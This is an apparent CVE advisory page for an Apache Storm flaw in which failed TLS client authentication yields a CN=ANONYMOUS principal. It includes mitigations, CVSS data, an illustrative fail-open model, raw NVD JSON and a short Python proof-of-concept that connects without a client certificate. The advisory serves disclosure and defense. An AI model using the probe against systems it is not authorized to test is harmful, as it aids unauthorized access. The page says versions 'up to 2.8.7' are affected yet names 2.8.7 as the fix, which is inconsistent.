Security Vulnerability Report
CVE-2026-41081 CVSS 6.5 MEDIUM

Published: 2026-04-27 14:16:48
Last Modified: 2026-04-28 19:46:07

Description

Improper Handling of TLS Client Authentication Failure Leading to Anonymous Principal Assignment in Apache Storm

Versions Affected: up to 2.8.7

Description: When TLS transport is enabled in Apache Storm without requiring client certificate authentication (the default configuration), the TlsTransportPlugin assigns a fallback principal (CN=ANONYMOUS) if no client certificate is presented or if certificate verification fails. The underlying SSLPeerUnverifiedException is caught and suppressed rather than rejecting the connection.

This fail-open behavior means an unauthenticated client can establish a TLS connection and receive a valid principal identity. If the configured authorizer (e.g., SimpleACLAuthorizer) does not explicitly deny access to CN=ANONYMOUS, this may result in unauthorized access to Storm services. The condition is logged at debug level only, reducing visibility in production.

Impact: Unauthenticated clients may be assigned a principal identity, potentially bypassing authorization in permissive or misconfigured environments.

Mitigation: Users should upgrade to 2.8.7, in which TLS authentication failures are handled in a fail-closed manner.

Users who cannot upgrade immediately should:
- Enable mandatory client certificate authentication (nimbus.thrift.tls.client.auth.required: true)
- Ensure authorization rules explicitly deny access to CN=ANONYMOUS
- Review all ACL configurations for implicit default-allow behavior
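The fail-open principal assignment described above, modelled in Python as an added example (this is not Storm's own TlsTransportPlugin code): the vulnerable handler swallows the verification error at debug level and hands out CN=ANONYMOUS, the fail-closed handler lets the error reject the connection, and a minimal ACL check shows why an implicit default-allow lets the anonymous principal through while an explicit deny does not. Certificate dicts follow the shape Python's ssl getpeercert() returns; the PeerUnverified class, both handlers, the ACL helper and the worker certificate are constructed for this example.

```python
import logging

log = logging.getLogger("tls-auth")
ANONYMOUS = "CN=ANONYMOUS"

class PeerUnverified(Exception):
    """Stand-in for Java's SSLPeerUnverifiedException (constructed for this example)."""

def principal_from_peer(peer_cert):
    """Return 'CN=<name>' from a cert in ssl.SSLSocket.getpeercert() form.
    getpeercert() yields None when no client cert was presented and an empty
    dict when it was not verified: both count as an unverified peer."""
    if not peer_cert:
        raise PeerUnverified("no verified client certificate")
    for rdn in peer_cert.get("subject", ()):
        for attr, value in rdn:
            if attr == "commonName":
                return f"CN={value}"
    raise PeerUnverified("client certificate carries no CN")

def principal_fail_open(peer_cert):
    """Handling the advisory describes for affected Storm versions: the failure
    is logged at debug level only and the ANONYMOUS fallback is returned."""
    try:
        return principal_from_peer(peer_cert)
    except PeerUnverified as exc:
        log.debug("client auth failed (%s); assigning %s", exc, ANONYMOUS)
        return ANONYMOUS

def principal_fail_closed(peer_cert):
    """Fail-closed handling: the error propagates and the connection is rejected."""
    return principal_from_peer(peer_cert)

def connection_accepted(handler, peer_cert):
    """True if the handler lets a peer with this certificate through."""
    try:
        handler(peer_cert)
        return True
    except PeerUnverified:
        return False

def is_authorized(principal, allow, deny=()):
    """Minimal ACL: an explicit deny wins; an empty allow list is the
    'implicit default-allow' the advisory tells operators to review."""
    if principal in deny:
        return False
    return not allow or principal in allow

# Constructed sample peer: a verified worker cert (an unauthenticated client is None).
WORKER_CERT = {"subject": ((("commonName", "storm-worker-1"),),)}
```

With the fail-open handler an unauthenticated client is accepted as CN=ANONYMOUS and passes an empty (default-allow) ACL; only an explicit deny entry or the fail-closed handler stops it.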

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:storm:*:*:*:*:*:*:*:* - VULNERABLE
Apache Storm < 2.8.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket
import ssl

# Conceptual PoC for CVE-2026-41081
# Attempt to connect to the Apache Storm Nimbus TLS port without presenting
# a client certificate. If the server accepts the connection and assigns
# 'CN=ANONYMOUS', the vulnerability is confirmed.


def check_vulnerability(host, port):
    context = ssl.create_default_context()
    # Do not load client certs, to simulate an unauthenticated client.
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE  # For testing purposes only
    try:
        with socket.create_connection((host, port)) as sock:
            with context.wrap_socket(sock, server_hostname=host) as ssock:
                print(f"[+] Connected to {host}:{port}")
                # If connected, check logs or behaviour to see whether the
                # principal is ANONYMOUS. Exploitation depends on whether the
                # authorizer allows ANONYMOUS access.
                print("[+] TLS handshake successful without client certificate.")
                print("[!] Check server logs for assignment of CN=ANONYMOUS principal.")
                return True
    except Exception as e:
        print(f"[-] Connection failed: {e}")
        return False


if __name__ == "__main__":
    target_host = "127.0.0.1"
    target_port = 6627  # Default Storm Nimbus TLS port
    check_vulnerability(target_host, target_port)
```

References

- https://lists.apache.org/thread/plxx5l29dvplk5rwzdcq53rdfl6v4gs8 (Mailing List, Vendor Advisory)
- http://www.openwall.com/lists/oss-security/2026/04/25/3 (Mailing List, Third Party Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-41081",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-27T14:16:48.167",
    "lastModified": "2026-04-28T19:46:06.647",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Improper Handling of TLS Client Authentication Failure Leading to Anonymous Principal Assignment in Apache Storm\n\nVersions Affected: up to 2.8.7\n\nDescription: When TLS transport is enabled in Apache Storm without requiring client certificate authentication (the default configuration), the TlsTransportPlugin assigns a fallback principal (CN=ANONYMOUS) if no client certificate is presented or if certificate verification fails. The underlying SSLPeerUnverifiedException is caught and suppressed rather than rejecting the connection.\n\nThis fail-open behavior means an unauthenticated client can establish a TLS connection and receive a valid principal identity. If the configured authorizer (e.g., SimpleACLAuthorizer) does not explicitly deny access to CN=ANONYMOUS, this may result in unauthorized access to Storm services. The condition is logged at debug level only, reducing visibility in production.\n\nImpact: Unauthenticated clients may be assigned a principal identity, potentially bypassing authorization in permissive or misconfigured environments.\n\nMitigation: Users should upgrade to 2.8.7 in which TLS authentication failures are handled in a fail-closed manner.\n\nUsers who cannot upgrade immediately should:\n- Enable mandatory client certificate authentication (nimbus.thrift.tls.client.auth.required: true)\n- Ensure authorization rules explicitly deny access to CN=ANONYMOUS\n- Review all ACL configurations for implicit default-allow behavior"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-287"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:apache:storm:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2.8.7",
                "matchCriteriaId": "9286B022-3864-4ED1-B740-F1BD9B79820F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://lists.apache.org/thread/plxx5l29dvplk5rwzdcq53rdfl6v4gs8",
        "source": "[email protected]",
        "tags": ["Mailing List", "Vendor Advisory"]
      },
      {
        "url": "http://www.openwall.com/lists/oss-security/2026/04/25/3",
        "source": "af854a3a-2127-422b-91ae-364da2661108",
        "tags": ["Mailing List", "Third Party Advisory"]
      }
    ]
  }
}
```